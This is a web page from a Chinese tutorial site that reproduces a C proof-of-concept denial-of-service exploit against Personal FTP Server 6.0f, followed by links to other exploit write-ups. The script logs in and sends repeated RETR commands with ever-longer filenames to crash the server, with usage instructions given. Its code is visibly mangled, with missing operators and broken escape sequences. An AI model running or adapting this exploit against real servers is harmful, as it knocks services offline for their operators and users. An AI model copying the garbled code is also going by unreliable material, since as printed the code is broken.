手机
当前位置:查字典教程网 >网络安全 >Exploit >The Personal FTP Server 6.0f RETR Denial of Service Exploit
The Personal FTP Server 6.0f RETR Denial of Service Exploit
摘要:/****ThePersonalFTPServer6.0fRETRDOSexploit***Avulnerabilityexistsinth...

/*

*** The Personal FTP Server 6.0f RETR DOS exploit *** A vulnerability exists in the way Personal FTP Server handles

multiple RETR commands with overly long filenames.When confronted

with such consecutive requests the server will crash. Usage : ./pftpdos ip port user password

Ex. : ./pftpdos 127.0.0.1 21 test test Personal FTP Server homepage: http://www.michael-roth-software.de/ Discovey POC by Shinnok raydenxy [at] yahoo <dot> com

http://shinnok.evonet.ro */ #include <stdio.h>

#include <stdlib.h>

#include <sys/socket.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <string.h>

#include <malloc.h>

#include <errno.h> int

min (int x, int y)

{

if (x < y)return x;

else

return y;

}

extern int errno; int

main (int argc, char *argv[])

{

struct sockaddr_in server;

int i, t, s;

char *req, *buff;

s = socket (AF_INET, SOCK_STREAM, 0);

bzero (&server, sizeof (server));

server.sin_family = AF_INET;

server.sin_addr.s_addr = inet_addr (argv[1]);

server.sin_port = htons (atoi (argv[2]));

connect (s, (struct sockaddr *) &server, sizeof (struct sockaddr));

req = malloc (sizeof (char) *

(((strlen (argv[3]) - strlen (argv[4]))

min (strlen (argv[3]), strlen (argv[4])) 8)));

sprintf (req, "USER %sxDxA", argv[3]);

write (s, req, strlen (req));

sprintf (req, "PASS %sxDxA", argv[4]);

write (s, req, strlen (req));

free (req);

for (i = 1; i <= 5; i )

{

t = (sizeof (char) * 1000 * i);

buff = malloc (t 1);

memset (buff, 'A', t);

buff[t 1] = '';

req = malloc (t 9);

sprintf (req, "RETR %sxDxA", buff);

if (write (s, req, strlen (req)) == -1)

{

perror (NULL);

printf ("Target pwned!n", errno);

}

free (req);

free (buff);

sleep (1);

}

close (s);

return (EXIT_SUCCESS);

}

【The Personal FTP Server 6.0f RETR Denial of Service Exploit】相关文章:

Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053)

MS Windows (MessageBox) Memory Corruption Local Denial of Service

BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

Maxthon Browser 2.1.4.443 UNICODE Remote Denial of Service PoC

Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

精品推荐
分类导航